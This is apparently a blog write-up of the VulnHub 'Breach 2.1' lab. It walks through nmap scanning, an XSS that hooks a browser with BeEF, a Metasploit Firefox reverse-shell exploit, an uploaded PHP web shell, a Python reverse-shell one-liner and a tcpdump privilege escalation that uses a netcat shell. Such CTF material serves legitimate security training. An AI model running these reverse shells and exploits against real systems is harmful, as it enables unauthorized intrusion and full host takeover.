[VULNHUB] Breach: 2.1

With this awesome Boot2Root VM I learned lot of stuff about XSS, Client-Side Attack and Privilege Escalation too. Let’s start.

PART ONE

I always start with an nmap scan:

nmap 192.168.110.151 -sV

This is the output:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:02 CEST
Nmap scan report for 192.168.110.151
Host is up (0.0034s latency).
Not shown: 999 closed ports
PORT    STATE SERVICE VERSION
111/tcp open  rpcbind 2-4 (RPC #100000)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 6.70 seconds

OK, something went wrong, then I retried the command with a full range port scan:

nmap -sV -p 1-65535 192.168.110.151

Now it is more interesting:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:05 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65532 closed ports
PORT      STATE SERVICE VERSION
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.09 seconds

There is only an SSH server to analyze. So I tried to log in:

ssh 192.168.110.151 -p 65535

And a banner appeared:

#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#            All connections are monitored and recorded                #
#                Unauthorized access is encouraged                     #
#        Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   # 
#############################################################################

I collected an username (peter) but I had to find the password which is “in the source”. I lost 2 days finding this password when at the end I guessed it: “inthesource”. So I connected to SSH again with peter as username:

ssh peter@192.168.110.151 -p 65535

I used inthesource as password and I couldn’t believe that it worked. Unfortunatelly I got an error after using this password:

Connection to 192.168.110.151 closed.

That was strange, so I retried an nmap scan:

nmap -sV -p 1-65535 192.168.110.151

And I found that the port 80 was open:

Starting Nmap 7.25BETA1 ( https://nmap.org ) at 2016-08-22 15:11 CEST
Nmap scan report for 192.168.110.151
Host is up (0.012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
57477/tcp open  status  1 (RPC #100024)
65535/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u2 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 15.23 seconds

OK, I visited http://192.168.110.151 and only a welcome page appeared. Looking into the source code I found this:

<!--I like hints! Here at Initech we don't trust our users and either should you!--<
<!--I'm not just going to stick creds here, really, I'm not. Sorry-->

Really useful! 😉
I rechecked the SSH banner and I noticed that it talks about a blog, maybe there is a subdirectory to find. I could use dirbuster but I just guessed the URL: http://192.168.110.151/blog. It is a simple blog and after some research I found a persistent XSS at register page. So I used Beef Framework to hook a possible victim browser:

sudo beef-xss -x

Type ” into the username input field at register page followed by a script with http://192.168.110.2:3000/hook.js as src parameter. After some minutes the victim browser was hooked. I tried to run some commands from Beef without success, so I took a look at the User-Agent:

Mozilla/5.0 (X11; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0

Our victim, who is Peter, is using Firefox 15 which is vulnerable. So I fired up Metasploit:

sudo msfconsole
use exploit/multi/browser/firefox_proto_crfmrequest
set PAYLOAD firefox/shell_reverse_tcp
set SRVHOST 192.168.110.2
set URIPATH shell
set LHOST 192.168.110.2
exploit

Then I went to register page again and I typed this into the iframe src parameter after the “:

http://192.168.110.2/shell

After some minutes I got a shell into Metasploit and I upgraded it to a meterpreter one:

sessions -u 0

Now I invoked the Unix shell:

shell

And I got TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Now I was logged in as peter. I browsed to /home directory and I collected two new usernames:
milton
bill

PART TWO

I moved to /tmp folder and I downloaded LinEnum. I gave it execution permissions:

chmod +x LinEnum.sh

And I ran it:

./LinEnum.sh

I discovered that there was a MySQL server accessible with root as username without the password. So I connected to it:

mysql -h 127.0.0.1 -u root

First of all I listed the databases:

SHOW databases;

This is the output:

+--------------------+
| Database           |
+--------------------+
| information_schema |
| blog               |
| mysql              |
| oscommerce         |
| performance_schema |
+--------------------+
5 rows in set (0.03 sec)

Then I looked for oscommerce:

USE oscommerce;
SHOW tables;
SELECT * FROM osc_administrators;

And this is the table content:

+----+-----------+-------------------------------------+
| id | user_name | user_password                       |
+----+-----------+-------------------------------------+
|  1 | admin     | 685cef95aa31989f2edae5e055ffd2c9:32 |
+----+-----------+-------------------------------------+

The password seems to be an MD5 one, so I browsed to CrackStation and I pasted the hashed password without the :32. I discovered that the password was 32admin which is a little strange, maybe the 32 is the salt so the real password is just admin. Looking again into LinEnum output I saw that the VM is listening on 2323 port, so I just connected to it with telnet:

telnet 127.0.0.1 2323

I found some coordinates and a login prompt appeared:

29 45'46" N 95 22'59" W

Looking with Google Maps I discovered that theese coordinates are locating at Houston Police Department Memorial. I need an username to login, I tried milton but a password prompt appears, I tried with Houston and it worked but immediately a countdown showed up (3…2…1…) and there was a question to answer:

Whose stapler is it?

Of course, it’s mine! So I used mine as password and I got the shell as milton. Looking around I discovered that into /var/www folder there was an html2 one which contained another folder: oscommerce. At this point there was nothing to do, so I tried a rescan with nmap:

nmap -sV -p 1-65535 192.168.110.151

Magically a new HTTP port was open: 8888. I browsed to http://192.168.110.151:8888 which has directory listing enabled. I clicked on /oscommerce and the site shows up. I went to http://192.168.110.151:8888/oscommerce/admin and I used admin:admin credentials to login. Now I need to find an upload form and I discovered a File Manager under Tools tab. Unfortunatelly I couldn’t upload nothing into the webserver root directory so I found a writable folder: includes/work. I uploaded b374k PHP shell and I typed this into Terminal tab:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.2",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

But before press ENTER I started listen locally:

sudo nc -lvp 1234

Now I got the shell and I am logged as blumbergh. Now I tried to escalate privileges.

PART THREE

 

sudo -l

I discovered that this user can execute tcpdump as root and also I know that tcpdump has postrotate command. So I switched to /tmp and I typed:

echo "nc 192.168.110.2 1235 -e /bin/bash" > shell.sh

Give +x permission:

chmod +x shell.sh

Then I started to listen locally:

sudo nc -lvp 1235

Then I executed the following command:

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/shell.sh -Z root

Got the shell as root! Then I browsed to /root and I listed the files:

ls -al

Gave +x permission to .flag.py and execute it:

./.flag.py

VM completed!

Advertisements
[VULNHUB] Breach: 2.1

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s